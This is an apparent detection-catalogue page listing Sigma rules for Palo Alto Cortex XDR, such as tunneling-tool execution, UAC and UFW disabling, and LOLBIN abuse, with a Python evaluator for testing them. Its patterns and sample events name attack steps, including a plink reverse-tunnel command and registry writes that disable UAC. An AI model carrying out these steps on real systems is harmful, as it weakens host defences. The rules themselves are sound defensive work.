Palo Alto Cortex XDR
559 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert. Check value formats as well as names: the registry_set rules below match Details against Sysmon's rendering of the data ('DWORD (0x00000000)'), so a sensor that reports the raw value needs that field rendered the same way, or the condition rewritten, before the rule can fire.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
Detection rules (50 shown of 559)

Tunneling Tool Execution
level medium · quality Moderate · alert volume High FP
title: Tunneling Tool Execution
id: c75309a3-59f8-4a8d-9c2c-4c927ad50555
status: test
description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
author: Daniil Yugoslavskiy, oscd.community
references:
    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
date: 2019-10-24
modified: 2024-01-18
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1041
    - attack.t1572
    - attack.t1071.001
    - detection.threat-hunting
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\httptunnel.exe'
            - '\plink.exe'
            - '\socat.exe'
            - '\stunnel.exe'
    condition: selection
falsepositives:
    - Legitimate administrators using one of these tools
level: medium

UAC Bypass via Windows Firewall Snap-In Hijack
level medium · quality Moderate · alert volume Medium FP
title: UAC Bypass via Windows Firewall Snap-In Hijack
id: e52cb31c-10ed-4aea-bcb7-593c9f4a315b
status: test
description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
references:
    - https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
    - attack.privilege-escalation
    - attack.t1548
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\mmc.exe'
        ParentCommandLine|contains: 'WF.msc'
    filter:
        Image|endswith: '\WerFault.exe'
    condition: selection and not filter
falsepositives:
    - Unknown
level: medium

UAC Disabled
level medium · quality Moderate · alert volume Medium FP
title: UAC Disabled
id: 48437c39-9e5f-47fb-af95-3d663c3f2919
related:
    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038
      type: similar
    - id: 0d7ceeef-3539-4392-8953-3dc664912714
      type: similar
status: stable
description: |
    Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
author: frack113
date: 2022-01-05
modified: 2024-05-10
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unknown
level: medium

UAC Notification Disabled
level medium · quality Moderate · alert volume Medium FP
title: UAC Notification Disabled
id: c5f6a85d-b647-40f7-bbad-c10b66bab038
related:
    - id: 0d7ceeef-3539-4392-8953-3dc664912714
      type: similar
    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919
      type: similar
status: test
description: |
    Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
    UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
    When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
    - https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2024-05-10
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Security Center\UACDisableNotify'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: medium

UAC Secure Desktop Prompt Disabled
level medium · quality Moderate · alert volume Medium FP
title: UAC Secure Desktop Prompt Disabled
id: 0d7ceeef-3539-4392-8953-3dc664912714
related:
    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038
      type: similar
    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919
      type: similar
status: test
description: |
    Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
    The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
    When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
author: frack113
date: 2024-05-10
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unknown
level: medium

UFW Disable Attempt
level medium · quality Strong · alert volume Medium FP
title: UFW Disable Attempt
id: 84c9e83c-599a-458a-a0cb-0ecce44e807a
status: test
description: |
    Detects attempts to disable the Uncomplicated Firewall (UFW) on Linux systems.
    UFW is a popular firewall management tool that provides an easy-to-use interface for configuring firewall rules.
    Disabling UFW can leave a system vulnerable to attacks, as it may allow unauthorized access to network services and resources.
references:
    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
    - https://manpages.debian.org/unstable/ufw/ufw-framework.8.en.html
    - https://www.cyberciti.biz/faq/linux-disable-firewall-command/
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-18
modified: 2026-05-04
tags:
    - attack.defense-impairment
    - attack.t1686
logsource:
    product: linux
    category: process_creation
detection:
    selection_ufw_init:
        Image|endswith: '/ufw-init'
        CommandLine|contains:
            - ' force-stop' # same as stop, except does not check if the firewall is already loaded
            - ' stop' # unloads the firewall
            - ' flush' # flushes the built-in chains, deletes all non-built-in chains and resets the policy to ACCEPT
    selection_ufw_disable:
        CommandLine|contains|all:
            # Intended to cover both "ufw disable" and "systemctl disable ufw"
            # systemctl disable ufw -- prevents UFW starting at boot, but does not stop the currently running instance of UFW
            # ufw disable -- stops the currently running instance of UFW and prevents it from starting at boot
            # Note: 'ufw ' carries a trailing space, so the plain "systemctl disable ufw" (nothing after the unit name) does not match; only variants with further arguments after "ufw" do
            - 'ufw '
            - 'disable'
    condition: 1 of selection_*
falsepositives:
    - Legitimate actions by system administrators to disable UFW.
level: medium

Uncommon Child Process Of AddinUtil.EXE
level medium · quality Moderate · alert volume High FP
title: Uncommon Child Process Of AddinUtil.EXE
id: b5746143-59d6-4603-8d06-acbd60e166ee
status: test
description: |
    Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023-09-18
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\addinutil.exe'
    filter_main_werfault:
        Image|endswith:
            - ':\Windows\System32\conhost.exe'
            - ':\Windows\System32\werfault.exe'
            - ':\Windows\SysWOW64\werfault.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Uncommon Child Process Of Appvlp.EXE
level medium · quality Strong · alert volume Medium FP
title: Uncommon Child Process Of Appvlp.EXE
id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43
status: test
description: |
    Detects uncommon child processes of Appvlp.EXE
    Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
    Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
    or to mark a file as a system file.
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/
author: Sreeman
date: 2020-03-13
modified: 2023-11-09
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\appvlp.exe'
    # Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/
    filter_main_generic:
        Image|endswith:
            - ':\Windows\SysWOW64\rundll32.exe'
            - ':\Windows\System32\rundll32.exe'
    filter_optional_office_msoasb:
        Image|contains: ':\Program Files\Microsoft Office'
        Image|endswith: '\msoasb.exe'
    filter_optional_office_skype:
        Image|contains|all:
            - ':\Program Files\Microsoft Office'
            - '\SkypeSrv\'
        Image|endswith: '\SKYPESERVER.EXE'
    filter_optional_office_msouc:
        Image|contains: ':\Program Files\Microsoft Office'
        Image|endswith: '\MSOUC.EXE'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Uncommon Child Process Of BgInfo.EXE
level medium · quality Moderate · alert volume High FP
title: Uncommon Child Process Of BgInfo.EXE
id: aaf46cdc-934e-4284-b329-34aa701e3771
related:
    - id: 811f459f-9231-45d4-959a-0266c6311987
      type: similar
status: test
description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/
    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
date: 2019-10-26
modified: 2023-08-16
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.005
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\bginfo.exe'
            - '\bginfo64.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Uncommon Child Process Of Defaultpack.EXE
level medium · quality Moderate · alert volume High FP
title: Uncommon Child Process Of Defaultpack.EXE
id: b2309017-4235-44fe-b5af-b15363011957
status: test
description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/
    - https://www.echotrail.io/insights/search/defaultpack.exe
author: frack113
date: 2022-12-31
modified: 2024-04-22
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\DefaultPack.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Uncommon Child Process Spawned By Odbcconf.EXE
level medium · quality Moderate · alert volume High FP
title: Uncommon Child Process Spawned By Odbcconf.EXE
id: 8e3c7994-131e-4ba5-b6ea-804d49113a26
status: test
description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
references:
    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
    - https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac
author: Harjot Singh @cyb3rjy0t
date: 2023-05-22
tags:
    - attack.stealth
    - attack.t1218.008
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\odbcconf.exe'
    condition: selection
falsepositives:
    - In rare cases where "odbcconf" crashes it might spawn a "werfault" process.
    - Other child processes depend on the DLL being registered (for example via "regsvr"). Where that DLL makes external calls, which should be rare, further child processes may appear and additional filters need to be applied.
level: medium

Uncommon Child Processes Of SndVol.exe
level medium · quality Moderate · alert volume Medium FP
title: Uncommon Child Processes Of SndVol.exe
id: ba42babc-0666-4393-a4f7-ceaf5a69191e
status: test
description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
references:
    - https://twitter.com/Max_Mal_/status/1661322732456353792
author: X__Junior (Nextron Systems)
date: 2023-06-09
tags:
    - attack.execution
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|endswith: '\SndVol.exe'
    filter_main_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains: ' shell32.dll,Control_RunDLL '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Uncommon Link.EXE Parent Process
level medium · quality Moderate · alert volume Medium FP
title: Uncommon Link.EXE Parent Process
id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6
status: test
description: |
    Detects an uncommon parent process of "LINK.EXE".
    LINK.EXE is the Microsoft incremental linker, a utility usually bundled with a Visual Studio installation.
    Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc.) have a hardcoded call to the "LINK.EXE" binary without checking its validity.
    This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools gets executed from a different location.
    By filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious.
references:
    - https://twitter.com/0gtweet/status/1560732860935729152
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-22
modified: 2024-06-27
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\link.exe'
        CommandLine|contains: 'LINK /' # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc
    # Add other filters for other legitimate locations
    filter_main_visual_studio:
        ParentImage|startswith:
            - 'C:\Program Files\Microsoft Visual Studio\'
            - 'C:\Program Files (x86)\Microsoft Visual Studio\'
        ParentImage|contains:
            - '\VC\bin\'
            - '\VC\Tools\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
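The Validate and Adapt steps above can be rehearsed offline before anything is pasted into a SIEM. The block below is an added example, not code from this page or from the Sigma project: a small Python evaluator for the subset of Sigma these rules use (endswith, startswith, contains, contains|all, list-of-maps OR, and conditions of the form 'A and not 1 of filter_*'), with four of the rules above (Tunneling Tool Execution, UAC Disabled, UFW Disable Attempt and Uncommon Link.EXE Parent Process) transcribed as dicts and run over constructed events. The Cortex XDR column names in XDR_TO_SIGMA (actor_process_image_path, action_registry_data and so on) are an assumption made to illustrate the field-mapping step and are not taken from the page; check them against your own tenant. Three outcomes are worth noting: the Link.EXE rule stays quiet when dumpbin.exe runs from under \VC\Tools\ and fires when it runs from Downloads; for UFW Disable Attempt the plain command systemctl disable ufw does not match, because the 'ufw ' pattern carries a trailing space; and the registry sample shows why a raw DWORD must be rendered into Sysmon's 'DWORD (0x00000000)' form before UAC Disabled can fire.

```python
# Added example (not from this page or the Sigma project): evaluate Sigma rule logic offline.

def _match_value(value: str, mods: set, patterns) -> bool:
    """Apply Sigma string modifiers; Sigma string matching is case-insensitive."""
    patterns = patterns if isinstance(patterns, list) else [patterns]
    v = value.lower()
    def one(p: str) -> bool:
        if "endswith" in mods:
            return v.endswith(p)
        if "startswith" in mods:
            return v.startswith(p)
        if "contains" in mods:
            return p in v
        return v == p  # no modifier: exact match
    hits = [one(str(p).lower()) for p in patterns]
    return all(hits) if "all" in mods else any(hits)

def _match_map(event: dict, mapping: dict) -> bool:
    """Every field condition inside one map must hold (AND); a missing field never matches."""
    for key, patterns in mapping.items():
        field, *mods = key.split("|")
        if field not in event or not _match_value(str(event[field]), set(mods), patterns):
            return False
    return True

def _match_item(event: dict, item) -> bool:
    """A selection written as a list of maps is OR-ed; a single map is AND-ed."""
    maps = item if isinstance(item, list) else [item]
    return any(_match_map(event, m) for m in maps)

def evaluate(detection: dict, event: dict) -> bool:
    """Handle conditions shaped 'A and not B and not 1 of prefix_*' (every condition on this page)."""
    names = [n for n in detection if n != "condition"]
    def term(tok: str) -> bool:
        if tok.startswith("1 of "):
            prefix = tok[5:].rstrip("*")
            return any(_match_item(event, detection[n]) for n in names if n.startswith(prefix))
        return _match_item(event, detection[tok])
    result = True
    for tok in detection["condition"].split(" and "):
        negate = tok.startswith("not ")
        result = result and (term(tok[4:] if negate else tok) != negate)
    return result

# Assumed Cortex XDR xdr_data column names (an assumption of this example, not from the page; verify in your tenant).
XDR_TO_SIGMA = {"actor_process_image_path": "ParentImage", "actor_process_command_line": "ParentCommandLine",
                "action_process_image_path": "Image", "action_process_image_command_line": "CommandLine"}

def normalise_xdr_process(row: dict) -> dict:
    return {sigma: row[xdr] for xdr, sigma in XDR_TO_SIGMA.items() if xdr in row}

def normalise_xdr_registry(row: dict) -> dict:
    """Sigma registry_set rules expect Sysmon's shape: TargetObject = key\\value and Details rendered
    like 'DWORD (0x00000000)'. Raw integer data must be rendered the same way or Details never matches."""
    data = row["action_registry_data"]
    details = f"DWORD (0x{data:08x})" if isinstance(data, int) else str(data)
    return {"TargetObject": row["action_registry_key_name"] + "\\" + row["action_registry_value_name"], "Details": details}

# Four rules from this page, transcribed from their YAML.
TUNNELING = {"selection": {"Image|endswith": ["\\httptunnel.exe", "\\plink.exe", "\\socat.exe", "\\stunnel.exe"]},
             "condition": "selection"}
LINK_PARENT = {"selection": {"Image|endswith": "\\link.exe", "CommandLine|contains": "LINK /"},
               "filter_main_visual_studio": {
                   "ParentImage|startswith": ["C:\\Program Files\\Microsoft Visual Studio\\",
                                              "C:\\Program Files (x86)\\Microsoft Visual Studio\\"],
                   "ParentImage|contains": ["\\VC\\bin\\", "\\VC\\Tools\\"]},
               "condition": "selection and not 1 of filter_main_*"}
UFW_DISABLE = {"selection_ufw_init": {"Image|endswith": "/ufw-init", "CommandLine|contains": [" force-stop", " stop", " flush"]},
               "selection_ufw_disable": {"CommandLine|contains|all": ["ufw ", "disable"]},
               "condition": "1 of selection_*"}
UAC_DISABLED = {"selection": {"TargetObject|contains": "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA",
                              "Details": "DWORD (0x00000000)"},
                "condition": "selection"}

# Constructed sample events (not real telemetry); XDR-shaped rows go through the mapping above.
VS_TOOLS = "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.38.33130\\bin\\Hostx64\\x64\\"

def _link_event(parent_dir: str) -> dict:
    # dumpbin.exe in parent_dir invoking the link.exe that sits beside it, as the rule's comment describes
    return normalise_xdr_process({"actor_process_image_path": parent_dir + "dumpbin.exe",
                                  "action_process_image_path": parent_dir + "link.exe",
                                  "action_process_image_command_line": "LINK /DUMP /HEADERS target.dll"})

SAMPLES = {
    "tunneling/plink": (TUNNELING, {"Image": "C:\\Tools\\plink.exe", "CommandLine": "plink.exe -R 3389:127.0.0.1:3389 ops@203.0.113.10"}),
    "link/downloads_parent": (LINK_PARENT, _link_event("C:\\Users\\bob\\Downloads\\")),
    "link/visual_studio_parent": (LINK_PARENT, _link_event(VS_TOOLS)),
    "ufw/ufw_disable": (UFW_DISABLE, {"Image": "/usr/bin/python3", "CommandLine": "/usr/bin/python3 /usr/sbin/ufw disable"}),
    "ufw/systemctl_disable": (UFW_DISABLE, {"Image": "/usr/bin/systemctl", "CommandLine": "systemctl disable ufw"}),
    "uac/enable_lua_zero": (UAC_DISABLED, normalise_xdr_registry({
        "action_registry_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
        "action_registry_value_name": "EnableLUA", "action_registry_data": 0})),
}

def run_all() -> dict:
    # {sample name: rule fired?} for every constructed sample
    return {name: evaluate(rule, event) for name, (rule, event) in SAMPLES.items()}

if __name__ == "__main__":
    print(run_all())
```

Extend SAMPLES with events lifted from your own telemetry; when a sample that should fire comes back False, the gap is nearly always a field name or a value format rather than the rule's logic, which is exactly what the Adapt step is for. The evaluator deliberately stops at the condition forms used on this page, so add 'or' and parentheses handling before pointing it at the wider corpus.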

Uncommon Sigverif.EXE Child Process
level medium · quality Moderate · alert volume Medium FP
title: Uncommon Sigverif.EXE Child Process
id: 7d4aaec2-08ed-4430-8b96-28420e030e04
status: test
description: |
    Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.
references:
    - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/
    - https://twitter.com/0gtweet/status/1457676633809330184
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-19
modified: 2024-08-27
tags:
    - attack.stealth
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\sigverif.exe'
    filter_main_werfault:
        Image:
            - 'C:\Windows\System32\WerFault.exe'
            - 'C:\Windows\SysWOW64\WerFault.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Unusual Parent Process For Cmd.EXE
level medium · quality Moderate · alert volume Medium FP
title: Unusual Parent Process For Cmd.EXE
id: 4b991083-3d0e-44ce-8fc4-b254025d8d4b
status: test
description: Detects suspicious parent process for cmd.exe
references:
    - https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-21
modified: 2023-12-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        ParentImage|endswith:
            - '\csrss.exe'
            - '\ctfmon.exe'
            - '\dllhost.exe'
            - '\epad.exe'
            - '\FlashPlayerUpdateService.exe'
            - '\GoogleUpdate.exe'
            - '\jucheck.exe'
            - '\jusched.exe'
            - '\LogonUI.exe'
            - '\lsass.exe'
            - '\regsvr32.exe'
            - '\SearchIndexer.exe'
            - '\SearchProtocolHost.exe'
            - '\SIHClient.exe'
            - '\sihost.exe'
            - '\slui.exe'
            - '\spoolsv.exe'
            - '\sppsvc.exe'
            - '\taskhostw.exe'
            - '\unsecapp.exe'
            - '\WerFault.exe'
            - '\wermgr.exe'
            - '\wlanext.exe'
            - '\WUDFHost.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Usage Of Web Request Commands And Cmdlets
level medium · quality Moderate · alert volume High FP
title: Usage Of Web Request Commands And Cmdlets
id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
related:
    - id: 1139d2e2-84b1-4226-b445-354492eba8ba
      type: similar
    - id: f67dbfce-93bc-440d-86ad-a95ae8858c90
      type: obsolete
    - id: cd5c8085-4070-4e22-908d-a5b3342deb74
      type: obsolete
    - id: 6e897651-f157-4d8f-aaeb-df8151488385
      type: obsolete
status: test
description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
references:
    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
    - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
date: 2019-10-24
modified: 2025-10-20
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '[System.Net.WebRequest]::create'
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
            - 'iwr '
            # - 'Net.WebClient' # There are various other rules that cover this, so it is commented out
            - 'Resume-BitsTransfer'
            - 'Start-BitsTransfer'
            - 'wget '
            - 'WinHttp.WinHttpRequest'
    condition: selection
falsepositives:
    - Use of the Get-Command and Get-Help cmdlets to reference Invoke-WebRequest and Start-BitsTransfer.
level: medium

Use NTFS Short Name in Command Line
level medium · quality Strong · alert volume High FP
title: Use NTFS Short Name in Command Line
id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795
related:
    - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b
      type: similar
status: test
description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection
references:
    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
    - https://twitter.com/jonasLyk/status/1555914501802921984
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-05
modified: 2022-09-21
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '~1.exe'
            - '~1.bat'
            - '~1.msi'
            - '~1.vbe'
            - '~1.vbs'
            - '~1.dll'
            - '~1.ps1'
            - '~1.js'
            - '~1.hta'
            - '~2.exe'
            - '~2.bat'
            - '~2.msi'
            - '~2.vbe'
            - '~2.vbs'
            - '~2.dll'
            - '~2.ps1'
            - '~2.js'
            - '~2.hta'
    filter:
        - ParentImage|endswith:
              - '\WebEx\WebexHost.exe'
              - '\thor\thor64.exe'
        - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE'
    condition: selection and not filter
falsepositives:
    - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
level: medium

Use NTFS Short Name in Image
level medium · quality Strong · alert volume Medium FP
title: Use NTFS Short Name in Image
id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b
related:
    - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795
      type: similar
status: test
description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid image-based detection
references:
    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
    - https://twitter.com/jonasLyk/status/1555914501802921984
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-06
modified: 2023-07-20
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|contains:
            - '~1.bat'
            - '~1.dll'
            - '~1.exe'
            - '~1.hta'
            - '~1.js'
            - '~1.msi'
            - '~1.ps1'
            - '~1.tmp'
            - '~1.vbe'
            - '~1.vbs'
            - '~2.bat'
            - '~2.dll'
            - '~2.exe'
            - '~2.hta'
            - '~2.js'
            - '~2.msi'
            - '~2.ps1'
            - '~2.tmp'
            - '~2.vbe'
            - '~2.vbs'
    filter_main_generic_parent:
        ParentImage: 'C:\Windows\explorer.exe'
    filter_optional_webex:
        ParentImage|endswith: '\WebEx\WebexHost.exe'
    filter_optional_thor:
        ParentImage|endswith: '\thor\thor64.exe'
    filter_optional_winzip:
        Image: 'C:\PROGRA~1\WinZip\WZPREL~1.EXE'
    filter_optional_vcred:
        Image|endswith: '\VCREDI~1.EXE'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Software Installers
level: medium

Use Of The SFTP.EXE Binary As A LOLBIN
level medium · quality Moderate · alert volume Medium FP
title: Use Of The SFTP.EXE Binary As A LOLBIN
id: a85ffc3a-e8fd-4040-93bf-78aff284d801
status: test
description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
references:
    - https://github.com/LOLBAS-Project/LOLBAS/pull/264
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-10
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\sftp.exe' # The "sftp.exe" located in the OpenSSH directory has no OriginalFileName :(
        CommandLine|contains:
            # Since "-D" is a valid flag for other usage we assume the user is going to enter a path
            # Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe"
            # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule)
            - ' -D ..'
            - ' -D C:\'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium
Strong
Medium FP
Use Short Name Path in Command Line
Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
When investigating, examine:
- Commands using short paths to access sensitive directories or files
- Web servers on Windows (especially Apache) where short filenames could bypass security controls
- Correlation with other suspicious behaviors
- baseline of short name usage in your environment and look for deviations
view Sigma YAML
title: Use Short Name Path in Command Line
id: 349d891d-fef0-4fe4-bc53-eee623a15969
related:
- id: a96970af-f126-420d-90e1-d37bf25e50e1
type: similar
status: test
description: |
Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
When investigating, examine:
- Commands using short paths to access sensitive directories or files
- Web servers on Windows (especially Apache) where short filenames could bypass security controls
- Correlation with other suspicious behaviors
- baseline of short name usage in your environment and look for deviations
references:
- https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
